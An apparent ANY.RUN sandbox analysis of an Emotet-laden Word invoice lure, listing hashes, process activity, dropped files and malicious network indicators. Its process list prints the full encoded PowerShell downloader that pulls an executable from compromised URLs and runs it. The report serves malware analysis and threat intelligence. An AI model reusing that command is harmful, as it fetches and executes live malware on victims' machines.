analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Requested invoice_L_8100.doc

Full analysis: https://app.any.run/tasks/af91f78d-1325-4df6-8307-6867e322b42f
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 09, 2019, 14:32:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: microchip, Subject: Path, Author: Favian Hackett, Keywords: distributed, Comments: Borders, Template: Normal.dotm, Last Saved By: Stevie Hettinger, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 14:50:00 2019, Last Saved Time/Date: Tue Oct 8 14:50:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0
MD5:

F0A192D0F5FAA8B4439D4BC7CAD9FE39

SHA1:

39A23A3F4E0AEBC042640DD51134810AE0734AA0

SHA256:

7C99358A9100DF75F9BAB44700B907A5D04A1040814D15A221B0490AB5E55EB0

SSDEEP:

3072:qT+y1EVIKgdzSrGEKyIwLx3OLSLK7TwtGmN40GUJHEkSwKtyc3:qT+y1EVIKUzS3nLx3OIN40FK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 14.exe (PID: 2660)
      • 14.exe (PID: 2116)
      • msptermsizes.exe (PID: 2372)
      • msptermsizes.exe (PID: 3008)
    • Emotet process was detected

      • 14.exe (PID: 2660)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2732)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2732)
    • Creates files in the user directory

      • powershell.exe (PID: 2732)
    • Executed via WMI

      • powershell.exe (PID: 2732)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2732)
      • 14.exe (PID: 2660)
    • Starts itself from another location

      • 14.exe (PID: 2660)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2928)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2928)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Cummerata
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 201
Paragraphs: 1
Lines: 1
Company: Bayer LLC
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 172
Words: 30
Pages: 1
ModifyDate: 2019:10:08 13:50:00
CreateDate: 2019:10:08 13:50:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Stevie Hettinger
Template: Normal.dotm
Comments: Borders
Keywords: distributed
Author: Favian Hackett
Subject: Path
Title: microchip
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 14.exe no specs #EMOTET 14.exe msptermsizes.exe no specs msptermsizes.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2928"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Requested invoice_L_8100.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2732powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADAAOAAwADkAOQBjADgANgAwADYAPQAnAGMANwB4ADMAMAA0ADAAMAA2ADQANwAzACcAOwAkAGIAOQA3ADYAMAAwADgANQAwAGMAeAAgAD0AIAAnADEANAAnADsAJABjADAAMQAxAHgAYwAyAGMAOQAzADAAMwAwAD0AJwBjAHgANgAxADAAeAA0ADUAMQA4ADgANAA3ACcAOwAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABiADkANwA2ADAAMAA4ADUAMABjAHgAKwAnAC4AZQB4AGUAJwA7ACQAYgA5ADkAMwAwADAAOAAzADAANQA4AD0AJwBjADAAeAB4AGMAOAA2ADYAMAAwAGMAJwA7ACQAYgAwADMAYwAwAGIAMwAwADQAMAA1AD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBiAGMATABJAEUAbgBUADsAJAB4AGIAMAA5ADcANQA4ADAAYgAxADAAPQAnAGgAdAB0AHAAOgAvAC8AaABvAG0AZQB0AG8AdwBuAGYAbABvAG8AcgBpAG4AZwB3AGYALgBjAG8AbQAvAGIAaQByAHQAaABkAGEAeQBfAHAAbwBwAHUAcAAvADEANABzAG0AMgBlAHUAaABhAC0AOQB5AG4AbgBkADcALQAwADcAOQAxAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAG8AcABpAGUAcgBtAGEAdABpAGMAYQAuAGMAbwBtAC8AcwBvAHgANgAyAGMALwBaAFQARwBaAGgARgAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGEAbgBoAGoAZQBuAGQAYQAuAG4AZQB0AC8AcgBvAGMAdwA4AGgAeQAvAGEAZAB4AGEANQAxAC0ANQBsADUAMABsADcAdABmAGwALQA5ADIAMwAvAEAAaAB0AHQAcAA6AC8ALwBsAGEAcABhAGsAbQBhAG4AaQBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ASwBuAGoAdABaAGoALwBAAGgAdAB0AHAAOgAvAC8AbQBhAGkAcwB2AGkAcwBpAHQAYQBkAG8AcwAuAGMAbwBtAC4AYgByAC8AcABlAGQAaQBkAG8ALQBvAG4AbABpAG4AZQAvAGEAcgBtAC0AcABuADgALQA5ADAALwAnAC4AIgBTAHAAYABMAGkAVAAiACgAJwBAACcAKQA7ACQAeAAwADcAMwA5ADgAOAA3ADAAMgA4ADYAPQAnAHgAOAA3ADAAYwA4AGIANgAyADcAOAAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAA4ADQANwA4ADUAMAAwADAAYwBjADAAMAAgAGkAbgAgACQAeABiADAAOQA3ADUAOAAwAGIAMQAwACkAewB0AHIAeQB7ACQAYgAwADMAYwAwAGIAMwAwADQAMAA1AC4AIgBkAG8AYABXAG4ATABPAGAAQQBkAGYAYABpAEwAZQAiACgAJAB4ADgANAA3ADgANQAwADAAMABjAGMAMAAwACwAIAAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4ACkAOwAkAGMANgAwADAANwA3ADUANQA4ADAANwA5ADAAPQAnAHgAOAA0ADYANAA2ADMAMABjADAAMABjADEAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJAB4ADcANAAyADcAMwA0AGIAMwAxADkAeAApAC4AIgBMAEUAYABOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwA1ADMAMwAwACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABgAEEAcgBUACIAKAAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4ACkAOwAkAGMANQAwADgAYgB4ADMAYgAwADIAOAA3ADAAPQAnAHgAMAA0ADMANwAxAGIAMAAzADgAOAAnADsAYgByAGUAYQBrADsAJABiADUAMQA5ADAAMAAwADIAMQBiADcAYwAzAD0AJwB4ADAAOQAwAGIAMAAwADIAMAA0AGMAMAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABiAHgANQAzADQANQA2AHgAMAA4AGMAYwA9ACcAYwAwADEAMQAwADYAMAA0ADAAOQA2AHgAMAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2116"C:\Users\admin\14.exe" C:\Users\admin\14.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2660--b731438dC:\Users\admin\14.exe
14.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2372"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe14.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3008--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exemsptermsizes.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 663
Read events
1 444
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
17

Dropped files

PID
Process
Filename
Type
2928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR4DA0.tmp.cvr
MD5:
SHA256:
2732powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HKU097U23ER9RMBHL3LF.temp
MD5:
SHA256:
2928WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:CB0890A34CBD6E1BE368D4CBC9212F34
SHA256:2913ED40B1A05DF7601B950AD1775A6BF15ABDA50CC4217E265085D78674A255
2928WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CB582E03.wmfwmf
MD5:B8494D6E2E4DB567A725CA9363781E77
SHA256:7A0E8070CFE40A63932BC9191EC7C3E8B2F5C3E5B79AC84A14D5A882CA89DCAA
2928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:E109A488BC9A812D264818B379F9737C
SHA256:2D15B5790436C9DDCFA625D9D5A80CCD1AEB473D1628CD75B8F80662E867B3E0
2928WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:37B026D0B988DCA6B6604AD23801B943
SHA256:E718A2DFDA4EB4919B724031B3201A10AA8B5CB726DF57A70056CEBCEE147A9A
2928WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5F7C91FF.wmfwmf
MD5:3C42744A300846ADA2FF73700045443D
SHA256:B528F10328D412295BA0407DFF1391E48AF61CA90B889CC5DAD9634C35BFBB90
2928WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Requested invoice_L_8100.doc.LNKlnk
MD5:212F3DC323A5DC8783165818D66B6506
SHA256:AC8955F5A98F1A3E706487E3EF64126EB24193E10E406B3D10C6DE35DC7AE101
2928WINWORD.EXEC:\Users\admin\Desktop\~$quested invoice_L_8100.docpgc
MD5:088C8C30118AD4B21BBC1F11F80BD9EF
SHA256:6C4EFE4D4657790428310E6B1FBA7D7E5FAECFD26C7991DF8067A1DB04D7423D
2928WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4BA876.wmfwmf
MD5:276491F4C73C63BB8D84001E782AC996
SHA256:22CA0E530DE62AAE7EDB15A8F92BF974620B1F9BECD6B088A3F51BFF23280F4C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2732
powershell.exe
GET
200
166.62.112.199:80
http://hometownflooringwf.com/birthday_popup/14sm2euha-9ynnd7-0791/
US
executable
136 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2732
powershell.exe
166.62.112.199:80
hometownflooringwf.com
GoDaddy.com, LLC
US
malicious

DNS requests

Domain
IP
Reputation
hometownflooringwf.com
  • 166.62.112.199
malicious

Threats

PID
Process
Class
Message
2732
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2732
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2732
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info